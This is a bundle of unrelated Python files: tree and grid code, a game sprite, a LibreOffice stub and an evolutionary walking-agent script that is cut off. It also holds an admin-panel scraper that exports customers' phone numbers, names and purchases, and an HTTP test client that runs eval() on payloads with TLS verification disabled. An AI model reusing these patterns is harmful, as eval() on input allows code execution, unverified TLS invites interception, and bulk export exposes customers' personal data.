        if root is None:
            # This key is not in the given sub-tree
            raise KeyError(key)
        elif key < root.key:
            # If the key exists, it must be left
            root.left = self._delete(root.left, key)
        elif key > root.key:
            # If the key exists, it must be right
            root.right = self._delete(root.right, key)
        elif root.left and root.right:
            # Replace K with the Min(T2)
            #      r               r
            #     / \             / \
            #    K   T3   ->    T2   T3
            #   / \             /
            #  T1  T2          T1
            # assert(root.key == key)
            new_root = self._pop_right_min(root)
            new_root.left = root.left
            new_root.right = root.right
            # Since we popped a node off, _n is already
            # updated since _delete was used to remove it.
            # Do not update _n here. the number is correct.
            return new_root
        elif root.left:
            # Replace K with T1
            #      r               r
            #     / \             / \
            #    K   T3   ->    T1   T3
            #   /
            #  T1
            # assert(root.key == key)
            self._n -= 1
            return root.left
        elif root.right:
            # Replace K with T1 (the right child)
            #      r               r
            #     / \             / \
            #    K   T3   ->    x    T3
            #     \
            #      T1
            # assert(root.key == key)
            self._n -= 1
            return root.right
        else:
            # Replace K with NULL
            #      r               r
            #     / \     ->        \
            #    K   T3              T3
            # assert(root.key == key)
            self._n -= 1
            return None
        # Recompute height of root
        root.height = self._compute_height(root)
        # return the balanced subtree
        return self._rebalance(root)
    def _insert(self, root: AVLNode, node: AVLNode) -> AVLNode:
        """Insert a node into a subtree"""
        if root is None:
            # Node fits here! Insert it.
            self._n += 1
            return node
        elif node.key < root.key:
            # Node fits left of this root
            root.left = self._insert(root.left, node)
        elif node.key > root.key:
            # Node fits right of this root
            root.right = self._insert(root.right, node)
        elif node.key == root.key:
            # Node is already in the tree.
            # Update it.
            root.value = node.value
        # Recompute height of root
        root.height = self._compute_height(root)
        # return the balanced subtree
        return self._rebalance(root)
    def _pop_right_min(self, root: AVLNode) -> AVLNode:
        """Remove the min from the right side of the given subtree"""
        n = self._get_min(root.right)
        root.right = self._delete(root.right, n.key)
        return n
    @classmethod
    def _rebalance(cls, root: AVLNode) -> AVLNode:
        """Rebalance the immediate subtree."""
        balance = cls._compute_balance(root)
        if balance > 1:  # left heavy
            if cls._compute_balance(root.left) < 0:
                # left-right case: rotate the left child first
                root.left = cls._rotate_left(root.left)
            return cls._rotate_right(root)
        elif balance < -1:  # Right heavy
            if cls._compute_balance(root.right) > 0:
                # right-left case: rotate the right child first
                root.right = cls._rotate_right(root.right)
            return cls._rotate_left(root)
        return root
    @classmethod
    def _rotate_right(cls, x: AVLNode) -> AVLNode:
        """Rotate a subtree around x.left"""
        # Rotate right, pivot on y
        #        x             y
        #       / \           / \
        #      y   T3 -->   T1   x
        #     / \               / \
        #    T1  T2            T2  T3
        y = x.left
        t2 = y.right
        y.right = x
        x.left = t2
        # x height is used to compute y height
        # so compute x first.
        x.height = cls._compute_height(x)
        y.height = cls._compute_height(y)
        return y
    @classmethod
    def _rotate_left(cls, y: AVLNode) -> AVLNode:
        """Rotate a subtree around y.right"""
        # Rotate left, pivot on x
        #        x             y
        #       / \           / \
        #      y   T3 <--   T1   x
        #     / \               / \
        #    T1  T2            T2  T3
        x = y.right
        t2 = x.left
        x.left = y
        y.right = t2
        # y height is used to compute x height
        # so compute y first.
        y.height = cls._compute_height(y)
        x.height = cls._compute_height(x)
        return x
    @classmethod
    def _get_min(cls, root: AVLNode) -> AVLNode:
        """Find the min value in a given subtree"""
        if root.left is None:
            return root
        return cls._get_min(root.left)
    @classmethod
    def _height(cls, root: AVLNode) -> int:
        """Get the normalized height of the given node.
        If the node is null, -1 will be returned.
        """
        if root is None:
            return -1
        return root.height
    @classmethod
    def _compute_height(cls, root: AVLNode) -> int:
        """Compute the height of the given subtree."""
        return max(cls._height(root.left), cls._height(root.right)) + 1
    @classmethod
    def _compute_balance(cls, root: AVLNode) -> int:
        """Compute the balance of the given subtree."""
        return cls._height(root.left) - cls._height(root.right)
|
<filename>stompy/model/delft/dflow_grid.py
# see how involved a NEFIS reader in native python/numpy would be
import os
import sys
import numpy as np
import matplotlib.pyplot as plt
import memoize
import matplotlib.tri as tri
class DflowGrid2D(object):
    """A 2D curvilinear Delft3D-FLOW grid.

    Holds corner coordinates (xcor, ycor), cell-center coordinates
    (xz, yz) and the active-cell mask (KCS), with helpers for plotting
    face- and node-centered data.
    """

    def __init__(self, xcor, ycor, xz, yz, active):
        self.xcor = xcor
        self.ycor = ycor
        self.xz = xz
        self.yz = yz
        self.active = active
        comp = (active == 1)  # computational (active) cells
        # A node is active when any of its four adjacent cells is active.
        self.node_active = comp.copy()
        self.node_active[:-1, :-1] = comp[1:, 1:] | comp[:-1, 1:] | comp[1:, :-1] | comp[:-1, :-1]

    @staticmethod
    def from_nef_map(nef):
        """Construct a grid from the 'map-const' group of a NEFIS map file."""
        xcor = nef['map-const'].getelt('XCOR', [0])
        ycor = nef['map-const'].getelt('YCOR', [0])
        xz = nef['map-const'].getelt('XZ', [0])
        yz = nef['map-const'].getelt('YZ', [0])
        active = nef['map-const'].getelt('KCS', [0])
        return DflowGrid2D(xcor, ycor, xz, yz, active)

    def wireframe(self):
        """Draw only the cell edges (no fill).

        NOTE: this double-draws interior edges shared by two cells.
        """
        coll = self.pcolor_face(0 * self.xcor)
        coll.set_array(None)
        coll.set_facecolors('none')
        return coll

    def pcolor_face(self, v):
        """Plot face-centered data `v`, masking inactive cells."""
        vmsk = np.ma.masked_where(self.active != 1, v)
        return plt.pcolor(self.xcor[:-1, :-1],
                          self.ycor[:-1, :-1],
                          vmsk[1:-1, 1:-1],
                          edgecolors='k', lw=0.2)

    def pcolormesh_node(self, v):
        """Plot node-centered data `v` with Gouraud shading, masking inactive nodes."""
        vmsk = np.ma.masked_where(~self.node_active, v)
        return plt.pcolormesh(self.xcor[:-1, :-1],
                              self.ycor[:-1, :-1],
                              vmsk[:-1, :-1],
                              edgecolors='k', lw=0.2,
                              shading='gouraud')

    @memoize.memoize()
    def to_triangulation(self):
        """Triangulate the active cells for tripcolor/tricontour plotting.

        Returns (T, idx_map): a matplotlib Triangulation over the used
        corner nodes, and idx_map giving the raveled original index of
        each compressed node.
        """
        # Map each 2D node index to a flat (not yet compressed) index.
        idx1d = np.arange(np.prod(self.xcor.shape)).reshape(self.xcor.shape)
        tris = []
        comp = (self.active == 1)[1:-1, 1:-1]
        for row, col in zip(*np.nonzero(comp)):
            # Split each active quad into two triangles (may not be CCW).
            tris.append([idx1d[row, col],
                         idx1d[row, col + 1],
                         idx1d[row + 1, col + 1]])
            tris.append([idx1d[row + 1, col + 1],
                         idx1d[row + 1, col],
                         idx1d[row, col]])
        used = np.unique(tris)
        x = self.xcor.ravel()[used]
        y = self.ycor.ravel()[used]
        # Compress node indices; integer dtype so the triangle array
        # passed to Triangulation is integral (was a float array before).
        remap = np.zeros(np.prod(self.xcor.shape), dtype=int)
        remap[used] = np.arange(len(used))
        tris = remap[tris]  # triangles now index the compressed nodes
        T = tri.Triangulation(x, y, tris)
        return T, used

    def pcolor_node(self, v, **kws):
        """tripcolor plot of node-centered data `v` (default Gouraud shading)."""
        my_kws = dict(shading='gouraud')
        my_kws.update(kws)
        T, idx_map = self.to_triangulation()
        return plt.tripcolor(T, v.ravel()[idx_map], **my_kws)

    def contourf_node(self, v, *args, **kws):
        """Filled contour plot of node-centered data `v`."""
        T, idx_map = self.to_triangulation()
        return plt.tricontourf(T, v.ravel()[idx_map], *args, **kws)
|
<filename>hecate/engine/world/floor.py
import random
import arcade
from ...assets.sprites import FLOOR, ALTAR, FLOOR_DECO
class Floor(arcade.Sprite):
    # Floor tile sprite whose texture is chosen from the FLOOR atlas based
    # on which neighboring directions contain walls.  `direction` is an
    # 8-bit mask: 1=e, 2=se, 4=s, 8=sw, 16=w, 32=nw, 64=n, 128=ne.
    def __init__(self, direction):
        super().__init__(scale=1)
        # For readability: decode the bitmask into direction names.
        self.wall_directions = []
        if 1 & direction == 1:
            self.wall_directions.append('e')
        if 2 & direction == 2:
            self.wall_directions.append('se')
        if 4 & direction == 4:
            self.wall_directions.append('s')
        if 8 & direction == 8:
            self.wall_directions.append('sw')
        if 16 & direction == 16:
            self.wall_directions.append('w')
        if 32 & direction == 32:
            self.wall_directions.append('nw')
        if 64 & direction == 64:
            self.wall_directions.append('n')
        if 128 & direction == 128:
            self.wall_directions.append('ne')
        # Corridor tiles: walls on two opposite cardinal sides.
        if 'e' in self.wall_directions and 'w' in self.wall_directions:
            self.texture = random.choice(FLOOR[23:25])
        elif 'n' in self.wall_directions and 's' in self.wall_directions:
            self.texture = random.choice(FLOOR[21:23])
        # Corner tiles: walls on two adjacent cardinal sides.
        elif 'n' in self.wall_directions and 'w' in self.wall_directions:
            self.texture = random.choice([FLOOR[1], FLOOR[60]])
        elif 's' in self.wall_directions and 'w' in self.wall_directions:
            self.texture = random.choice([FLOOR[3], FLOOR[58]])
        elif 's' in self.wall_directions and 'e' in self.wall_directions:
            self.texture = random.choice([FLOOR[4], FLOOR[57]])
        elif 'n' in self.wall_directions and 'e' in self.wall_directions:
            self.texture = random.choice([FLOOR[2], FLOOR[59]])
        else:
            # At most one cardinal wall from here on; branch on how many
            # wall bits (cardinal + diagonal) are set in total.
            if len(self.wall_directions) == 3:
                # One cardinal edge plus its flanking diagonals.
                if 'n' in self.wall_directions:
                    self.texture = random.choice(FLOOR[8:11])
                elif 'w' in self.wall_directions:
                    self.texture = random.choice(FLOOR[5:8])
                elif 's' in self.wall_directions:
                    self.texture = random.choice(FLOOR[11:14])
                else:
                    self.texture = random.choice(FLOOR[14:17])
            elif len(self.wall_directions) == 2:
                if 'n' in self.wall_directions:
                    self.texture = random.choice(FLOOR[8:11])
                elif 'w' in self.wall_directions:
                    self.texture = random.choice(FLOOR[5:8])
                elif 's' in self.wall_directions:
                    self.texture = random.choice(FLOOR[11:14])
                elif 'e' in self.wall_directions:
                    self.texture = random.choice(FLOOR[14:17])
                else:
                    # Two diagonal walls only (no cardinal walls).
                    if 'nw' in self.wall_directions and 'ne' in self.wall_directions:
                        self.texture = FLOOR[53]
                    elif 'nw' in self.wall_directions and 'sw' in self.wall_directions:
                        self.texture = FLOOR[54]
                    elif 'se' in self.wall_directions and 'ne' in self.wall_directions:
                        self.texture = FLOOR[55]
                    else:
                        self.texture = FLOOR[56]
            elif len(self.wall_directions) == 5:
                if 'n' in self.wall_directions:
                    self.texture = FLOOR[38]
                elif 'w' in self.wall_directions:
                    self.texture = FLOOR[39]
                elif 's' in self.wall_directions:
                    self.texture = FLOOR[41]
                else:
                    self.texture = FLOOR[40]
            elif len(self.wall_directions) == 0:
                # Open floor: pick a generic interior tile.
                self.texture = random.choice(FLOOR[-11:-3])
            else:
                # Remaining counts (e.g. 1 or 4 wall bits set).
                if 'n' in self.wall_directions:
                    if 'sw' in self.wall_directions:
                        self.texture = FLOOR[37]
                    else:
                        self.texture = FLOOR[36]
                elif 'w' in self.wall_directions:
                    if 'ne' in self.wall_directions:
                        self.texture = FLOOR[32]
                    else:
                        self.texture = FLOOR[30]
                elif 's' in self.wall_directions:
                    if 'nw' in self.wall_directions:
                        self.texture = FLOOR[35]
                    else:
                        self.texture = FLOOR[34]
                else:
                    if 'nw' in self.wall_directions:
                        self.texture = FLOOR[33]
                    else:
                        self.texture = FLOOR[31]
class FloorDecor(arcade.Sprite):
    """Decorative floor sprite: an altar texture when `altar` is truthy,
    otherwise a generic floor decoration."""
    def __init__(self, altar):
        super().__init__(scale=1)
        pool = ALTAR if altar else FLOOR_DECO
        self.texture = random.choice(pool)
|
#!/usr/bin/env python3
#coding=utf-8
__author__ = 'kk'
import sys
import time
import random
import xlrd, xlwt
import arrow
from requests import Session
import bs4
# Login credentials (password is a redacted placeholder).
LOGIN_INFO = {
    "username": "chenyk",
    "password": "<PASSWORD>"
}
# Browser-like headers sent with every request.
req_headers = {
    "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Encoding":"gzip, deflate, sdch",
    "Accept-Language":"en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4",
    "Connection":"keep-alive",
    "DNT":"1",
    "Host":"zcm.zcmlc.com",
    "Referer":"http://zcm.zcmlc.com/zcm/admin/login",
    "Upgrade-Insecure-Requests":"1",
    "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
}
URL_LOGIN = "http://zcm.zcmlc.com/zcm/admin/login"
# query account purchase info url
URL_QUERY_ACCOUNT_PURCHASE_INFO_WITH_PAGINATION = "http://zcm.zcmlc.com/zcm/admin/userdetailbuy?Page={page}&account={account}"
URL_QUERY_ACCOUNT_PURCHASE_INFO_WITH_TIME_RANGE = "http://zcm.zcmlc.com/zcm/admin/userdetailbuy?"
URL_QUERY_ORDER_DETAIL = "http://zcm.zcmlc.com/zcm/admin/userdetailtradedetal"
# xls tel column row name (header text of the phone-number column)
XLS_TEL_COL_ROW_NAME = "手机号"
# operator name filter: header of the assignment column and the
# operator name whose rows should be kept
XLS_NAME_FILTER = "分配"
XLS_NAME_FILTER_TO_FILTER = "陈益康"
# timeout for every request (seconds)
REQ_TIMEOUT = 3
# Column headers written to the first row of the output xls.
PAGE_ROW = (
    "电话",
    "订单号",
    "姓名",
    "购买时间",
    "产品名",
    "金额",
    "状态",
    "期限"
)
def is_success(code):
    """Return True when *code* is an HTTP 2xx success status."""
    return 200 <= code <= 299
def filter_tels(xls_sheet):
    """Collect the phone numbers of rows assigned to the target operator.

    :param xls_sheet: xlrd worksheet whose first row is the header
    :return: list of phone numbers (as ints)
    """
    header = xls_sheet.row_values(0)
    operator_idx = header.index(XLS_NAME_FILTER)
    tel_idx = header.index(XLS_TEL_COL_ROW_NAME)
    tels = []
    for row_num in range(len(xls_sheet.col(0))):
        row = xls_sheet.row_values(row_num)
        # Keep only rows assigned to the target operator with a non-empty tel.
        if row[operator_idx] == XLS_NAME_FILTER_TO_FILTER and row[tel_idx]:
            tels.append(int(row[tel_idx]))
    return tels
def parse_account_info(html):
    """Parse the purchase rows from an account listing page.

    :param html: raw HTML of the listing page
    :return: list of rows; each row is a list of stripped cell strings,
             with None kept as a placeholder for cells without a string
    """
    soup = bs4.BeautifulSoup(html, "html.parser")
    rows = []
    for tr in soup.select("#theadFix > tbody > tr"):
        cells = []
        for td in tr.select("td"):
            text = td.string
            if text is None:
                cells.append(None)  # placeholder for an empty cell
            elif text.strip():
                cells.append(text.strip())
        rows.append(cells)
    return rows  # all parsed rows
def parse_purchase_info(html):
    """Parse purchase info from an order-detail page.

    :param html: raw HTML of the order detail page
    :return: tuple of (term, buyer name) — ("期限", "购买人姓名")
    """
    soup = bs4.BeautifulSoup(html, "html.parser")
    cells = soup.select(".content_details > table > tbody > tr > td")
    return cells[8].text, cells[4].text
def random_pause(delay_level):
    """Sleep for a random whole number of seconds in [0, delay_level).

    :param delay_level: maximum delay (exclusive); must coerce to an
        int in [1, 60].
    :raises ValueError: if delay_level is not a number or is out of range.
    """
    try:
        delay_level = int(delay_level)
    except (TypeError, ValueError) as exc:
        # Narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit; chain the original cause.
        raise ValueError("Not a number.") from exc
    if not 1 <= delay_level <= 60:
        raise ValueError("bad delay level.")
    time.sleep(random.choice(range(delay_level)))
def generate_new_xls_filename():
    """Derive the output filename from the input xls name plus a timestamp."""
    stamp = arrow.now().format("YYYY-MM-DD HH-mm-ss")
    base = sys.argv[1][:-4]  # drop the '.xls' extension
    return base + " - 账户导出数据(%s).xls" % stamp
def main():
    """Interactive entry point: read tels from the input xls, log in,
    query each account's purchases and write the results to a new xls."""
    sess = Session()  # session holds the login cookie for this run
    # === read xls ===
    speed_level = input("搜索速度等级(1至60,默认为20):")
    if not speed_level:
        speed_level = "20"
    print(speed_level)
    print("读xls电话列…")
    if len(sys.argv)<=1:
        raise Exception("没有输入 xls 文件")
    print("文件名: " + sys.argv[1])
    wb = xlrd.open_workbook(sys.argv[1])
    sheet1 = wb.sheet_by_index(0)
    tels = filter_tels(sheet1)
    print("搜寻到可用的电话号码数: " + str(len(tels)))
    # === logging ===
    print("登录账户…")
    verify_code = input("输入你当前的验证码:")
    while not verify_code:
        verify_code = input("输入你当前的验证码:")
    LOGIN_INFO.update({"code": verify_code})
    resp = sess.post(URL_LOGIN, data=LOGIN_INFO, headers=req_headers)
    if not is_success(resp.status_code):
        raise Exception("登录失败。(%s)" % resp.status_code)
    # === requests ===
    print("查询数据…")
    print("设置时间起始终止, 输入格式为:年年年年-月月-日日, 然后回车。")
    time_begin = input("起始日期: ")
    time_end = input("终止日期: ")
    if time_begin:
        time_begin = arrow.get(time_begin)
        time_begin = time_begin.format("YYYY-MM-DD HH:mm:ss")
        print("起始时间为: " + time_begin)
    if time_end:
        time_end = arrow.get(time_end)
        time_end = time_end.format("YYYY-MM-DD HH:mm:ss")
        print("结束时间为: " + time_end)
    # Build the output filename, then write the header row of the xls.
    file_name = generate_new_xls_filename()
    print("输出文件: " + file_name)
    doc = xlwt.Workbook()
    sheet = doc.add_sheet("sheet1")
    # Write the first row: column headers.
    for n in range(len(PAGE_ROW)):
        sheet.write(0,n,PAGE_ROW[n])
    doc.save(file_name)
    current_line = 1  # current xls row being written
    for current_tel in tels:
        # FIXME only fetch the first page
        resp = sess.get(URL_QUERY_ACCOUNT_PURCHASE_INFO_WITH_TIME_RANGE, params={
            "purchaseDatebegin":time_begin,
            "purchaseDateend":time_end,
            "account": current_tel
        }, headers=req_headers, timeout=REQ_TIMEOUT)
        if not is_success(resp.status_code):
            raise Exception("请求数据时返回状态错误, code: {code}, account: {account}".format(
                code=resp.status_code,
                account=current_tel
            ))
        rst = parse_account_info(resp.content)
        for an_order in rst:
            order_id = an_order[1]
            data_to_write = [current_tel, order_id]
            print((current_tel, order_id))
            # Fetch the order detail for the term and buyer name.
            resp = sess.get(URL_QUERY_ORDER_DETAIL, params={"account":current_tel, "id":order_id},
                            headers=req_headers,
                            timeout=REQ_TIMEOUT)
            new_rst = parse_purchase_info(resp.content)
            data_to_write.append(new_rst[1])
            data_to_write += [an_order[0], an_order[2], an_order[3], an_order[4]]
            data_to_write.append(new_rst[0])
            for j in range(len(data_to_write)):
                sheet.write(current_line, j, data_to_write[j])
            current_line += 1  # advance to the next output row
        doc.save(file_name)
        print("写入%s" % current_tel)
        random_pause(speed_level)
# Script entry point.
if __name__=="__main__":
    main()
|
import json
from httptesting.library.scripts import (
get_datetime_str,
retry,
get_yaml_field,
parse_args_func
)
from requests.exceptions import (HTTPError, ConnectionError, ConnectTimeout)
from httptesting.globalVar import gl
from httptesting.library.Multipart import MultipartFormData
from httptesting.library.func import FUNC
#########################################################################
#requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#Remove warnings when SSL is turned off dueto requests.
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
###########################################################################
class HttpWebRequest(object):
    """
    HTTP post requests or get requests.

    usage:
        # instance class
        http = HttpWebRequest()
        res = http.get(**kwargs)
        res = http.post(**kwargs)
    """

    def __init__(self):
        # Framework-level YAML config (BASE_URL, ENABLE_BASE_URL, ...).
        self.config = get_yaml_field(gl.configFile)
        self.baseUrl = self.config['BASE_URL']
        # Report template: description / timestamp / method / url / payload.
        # The Chinese literals are part of the emitted report text -- keep as-is.
        self.OUT_TMPL = """{0}:\n{1} {2}请求:{3}\n请求:\n{4}\n响应:"""

    def header_lower(self, hdict):
        """
        Convert HTTP header information to lowercase.

        param:
            hdict: Head dictionary type.
        usage:
            ret = header_lower(hdict)
        return:
            dict Head dictionary type.
        """
        tmp = {}
        for key, val in hdict.items():
            tmp[str(key).lower()] = str(val).lower()
        return tmp

    def _build_url(self, gurl):
        """Prepend BASE_URL when ENABLE_BASE_URL is set in the config."""
        if self.config['ENABLE_BASE_URL']:
            return '{}{}'.format(self.baseUrl, str(gurl).strip())
        return str(gurl).strip()

    @retry(reNum=3)
    def get(self, **kwargs):
        """
        Get requests.

        Param:
            **kwargs Request dictionary object.
        Usage:
            http = HttpWebRequest()
            res, headers, cookie, result = http.get(**kwargs)
        Return:
            res:     Request object (None when the request itself failed).
            headers: Response headers object ({} on failure).
            cookie:  Request cookie ({} on failure).
            result:  Request results result.json() or result.text,
                     or {"errcode": 9xxx, "errmsg": ...} on error.
        """
        # NOTE(security): eval() executes the test-case payload as Python.
        # Safe only while test data is trusted; consider ast.literal_eval.
        try:
            params = eval(kwargs['params'])
        except (TypeError, ValueError):
            params = kwargs['params']
        # Whether to adopt: url = base_url + url
        url = self._build_url(kwargs['gurl'])
        #####################Function############################
        # format output.
        params = json.dumps(params, sort_keys=True, indent=4)
        # Report output template.
        tmpl = self.OUT_TMPL.format(
            kwargs['desc'],
            get_datetime_str(),
            kwargs['method'],
            url,
            params
        )
        print(tmpl)
        # Pre-initialize so the return statement cannot raise NameError when
        # the request fails (bug fix: these were unbound on the except paths).
        res, headers, cookie = None, {}, {}
        try:
            res = requests.request(kwargs['method'], url, params=params, headers=kwargs['headers'], verify=False)
            headers = res.headers
            cookie = res.cookies.get_dict()
            if res.status_code == 200:
                if 'json' in headers['Content-Type']:
                    result = res.json()
                else:
                    result = res.text
            else:
                result = {"errcode": 9001, "errmsg": str(res)}
        except (HTTPError, ConnectionError, ConnectTimeout) as ex:
            result = {"errcode": 9002, "errmsg": str(ex)}
        except Exception as ex:
            result = {"errcode": 9003, "errmsg": str(ex)}
        # format output.
        tmpl_result = json.dumps(result, sort_keys=True, indent=4, ensure_ascii=False)
        print(tmpl_result)  # The Response results are output to the report.
        return res, headers, cookie, result

    # Post Request
    @retry(reNum=3)
    def post(self, **kwargs):
        """
        Post requests. Dispatches on the (lower-cased) Content-Type header:
        form-data / application/json / x-www-form-urlencoded / fallback params.

        Returns the same 4-tuple as get().
        """
        # Whether to adopt: url = base_url + url
        url = self._build_url(kwargs['gurl'])
        #####################Function############################
        # NOTE(security): eval() on test payload -- see get().
        try:
            data = eval(kwargs['data'])
        except (TypeError, ValueError):
            data = kwargs['data']
        header = kwargs['headers']
        desc = kwargs['desc']
        # format output
        tmpl_data = json.dumps(data, sort_keys=True, indent=4, ensure_ascii=False)
        # Report output template.
        tmpl = self.OUT_TMPL.format(
            desc,
            get_datetime_str(),
            kwargs['method'],
            url,
            tmpl_data
        )
        print(tmpl)
        header_dict = self.header_lower(kwargs['headers'])
        # Pre-initialize so the return statement cannot raise NameError when
        # the request fails (bug fix: these were unbound on the except path).
        res, headers, cookie = None, {}, {}
        try:
            # Convert the data to form-data.
            if 'form-data' in header_dict['content-type']:
                data = MultipartFormData.to_form_data(data, headers=header)
                res = requests.request(
                    kwargs['method'],
                    url,
                    data=data.encode(),
                    headers=header,
                    verify=False
                )
            elif 'application/json' in header_dict['content-type']:
                res = requests.request(
                    kwargs['method'],
                    url,
                    json=data,
                    headers=header,
                    verify=False
                )
            elif 'application/x-www-form-urlencoded' in header_dict['content-type']:
                res = requests.request(
                    kwargs['method'],
                    url,
                    data=data,
                    headers=header,
                    verify=False
                )
            else:
                res = requests.request(
                    kwargs['method'],
                    url,
                    params=data,
                    headers=header,
                    verify=False
                )
            headers = res.headers
            cookie = res.cookies.get_dict()
            if res.status_code == 200:
                if 'json' in headers['Content-Type']:
                    result = res.json()
                else:
                    result = res.text
            else:
                result = {"errcode": 9001, "errmsg": str(res)}
        except (HTTPError, ConnectionError, ConnectTimeout) as ex:
            result = {"errcode": 9002, "errmsg": str(ex)}
        except Exception as ex:
            # Bug fix: mirror get()'s generic handler -- previously any other
            # exception (e.g. a missing content-type key) escaped and left
            # `result` undefined.
            result = {"errcode": 9003, "errmsg": str(ex)}
        # format output.
        tmpl_result = json.dumps(result, sort_keys=True, indent=4, ensure_ascii=False)
        # The Response results are output to the report.
        print(tmpl_result)
        return res, headers, cookie, result
|
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Service Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.text
import typing
from abc import abstractproperty
from .base_frame import BaseFrame as BaseFrame_8f020a33
if typing.TYPE_CHECKING:
from ..awt.size import Size as Size_576707ef
from ..container.x_index_container import XIndexContainer as XIndexContainer_1c040ebe
from ..drawing.color_mode import ColorMode as ColorMode_b13e0b78
from ..drawing.point_sequence_sequence import PointSequenceSequence as PointSequenceSequence_5c591070
from ..graphic.x_graphic import XGraphic as XGraphic_a4da0afc
from .graphic_crop import GraphicCrop as GraphicCrop_a58e0b1f
class TextGraphicObject(BaseFrame_8f020a33):
    """
    Service Class

    specifies a graphic which can be embedded in Text.

    See Also:
        `API TextGraphicObject <https://api.libreoffice.org/docs/idl/ref/servicecom_1_1sun_1_1star_1_1text_1_1TextGraphicObject.html>`_
    """
    # NOTE: auto-generated stub (see file header) -- manual edits may be
    # overwritten by regeneration.
    __ooo_ns__: str = 'com.sun.star.text'
    __ooo_full_ns__: str = 'com.sun.star.text.TextGraphicObject'
    __ooo_type_name__: str = 'service'

    @abstractproperty
    def ActualSize(self) -> 'Size_576707ef':
        """
        contains the original size of the bitmap in the graphic object.
        """

    @abstractproperty
    def AdjustBlue(self) -> int:
        """
        changes the display of the blue color channel.

        It contains percentage values between -100 and +100.
        """

    @abstractproperty
    def AdjustContrast(self) -> int:
        """
        changes the display of contrast.

        It contains percentage values between -100 and +100.
        """

    @abstractproperty
    def AdjustGreen(self) -> int:
        """
        changes the display of the green color channel.

        It contains percentage values between -100 and +100.
        """

    @abstractproperty
    def AdjustLuminance(self) -> int:
        """
        changes the display of the luminance.

        It contains percentage values between -100 and +100.
        """

    @abstractproperty
    def AdjustRed(self) -> int:
        """
        changes the display of the red color channel.

        It contains percentage values between -100 and +100.
        """

    @abstractproperty
    def ContentProtected(self) -> bool:
        """
        determines if the content is protected against changes from the user interface.
        """

    @abstractproperty
    def ContourOutside(self) -> bool:
        """
        the text flows only around the contour of the object.
        """

    @abstractproperty
    def ContourPolyPolygon(self) -> 'PointSequenceSequence_5c591070':
        """
        contains the contour of the object as PolyPolygon.
        """

    @abstractproperty
    def Gamma(self) -> float:
        """
        determines the gamma value of the graphic.
        """

    @abstractproperty
    def Graphic(self) -> 'XGraphic_a4da0afc':
        """
        contains the background graphic of the object.
        """

    @abstractproperty
    def GraphicColorMode(self) -> 'ColorMode_b13e0b78':
        """
        contains the ColorMode as com.sun.star.drawing.ColorMode.
        """

    @abstractproperty
    def GraphicCrop(self) -> 'GraphicCrop_a58e0b1f':
        """
        contains the cropping of the object.
        """

    @abstractproperty
    def GraphicFilter(self) -> str:
        """
        contains the name of the filter of the background graphic of the object.
        """

    @abstractproperty
    def GraphicIsInverted(self) -> bool:
        """
        determines if the graphic is displayed in inverted colors.
        """

    @abstractproperty
    def GraphicURL(self) -> str:
        """
        contains the URL of the background graphic of the object

        Note the new behaviour since it was deprecated: This property can only be set and only external URLs are supported (no more vnd.sun.star.GraphicObject scheme). When a URL is set, then it will load the image and set the Graphic property.
        """

    @abstractproperty
    def HoriMirroredOnEvenPages(self) -> bool:
        """
        determines if the object is horizontally mirrored on even pages.
        """

    @abstractproperty
    def HoriMirroredOnOddPages(self) -> bool:
        """
        determines if the object is horizontally mirrored on odd pages.
        """

    @abstractproperty
    def ImageMap(self) -> 'XIndexContainer_1c040ebe':
        """
        returns the client-side image map if one is assigned to the object.
        """

    @abstractproperty
    def SurroundContour(self) -> bool:
        """
        determines if the text wraps around the contour of the object.
        """

    @abstractproperty
    def Transparency(self) -> int:
        """
        contains percentage values between -100 and +100.
        """

    @abstractproperty
    def VertMirrored(self) -> bool:
        """
        determines if the object is mirrored vertically.
        """


__all__ = ['TextGraphicObject']
|
import ea
import leggedwalker
import numpy as np
import math
from jason.rl_ctrnn import RL_CTRNN
from jason.ctrnn import CTRNN
from walking_task2 import WalkingTask
import warnings
from scipy.ndimage.interpolation import shift
import matplotlib.pyplot as plt
from matplotlib import cm
import os
import time
from matplotlib.colors import ListedColormap
import concurrent.futures #multiprocessing
# Route numpy floating-point errors through the warnings machinery, and show
# every warning occurrence (not just the first per call site).
np.seterr(all='warn')
warnings.simplefilter("always")

# Nervous System Parameters
N = 2    # Number of neurons in the nervous system
WR = 16  # Weight range - maps from [-1, 1] to: [-16,16]
BR = 16  # Bias range - maps from [-1, 1] to: [-16,16]
TR = 5.0 # Time range - maps from [-1, 1] to: [-5, 5]
TA = 6.0 # Time add - maps from [-5, 5] to: [1,11]

# Task Parameters
stepsize = 0.1  # Euler integration step (simulated seconds)
#time = np.arange(0.0, duration, stepsize)
# NOTE(review): cm.get_cmap is deprecated in matplotlib >= 3.7; may need
# matplotlib.colormaps['tab10'] eventually -- confirm installed version.
x = cm.get_cmap('tab10')
colors = x.colors
duration = 2000  # Total simulated time per fitness evaluation (seconds)
def fitnessFunction(genotype):
    """Evaluate a genotype: average forward velocity of the walker.

    Maps the flat genotype onto an N-neuron CTRNN (N*N weights, N biases,
    N time constants), couples it to a legged body, integrates for
    `duration` seconds with Euler steps of `stepsize`, and returns the
    distance covered divided by the duration.
    """
    # Create the agent's body
    legged = leggedwalker.LeggedAgent()
    # Create the nervous system
    ns = CTRNN(N)
    # Set the parameters of the nervous system according to the
    # genotype-phenotype map.
    weights = genotype[0:N * N]
    ns.setWeights(weights.reshape((N, N)))
    ns.setBiases(genotype[N * N:N * N + N])
    ns.setTimeConstants(genotype[N * N + N:])
    # Initialize the state of the nervous system to some value
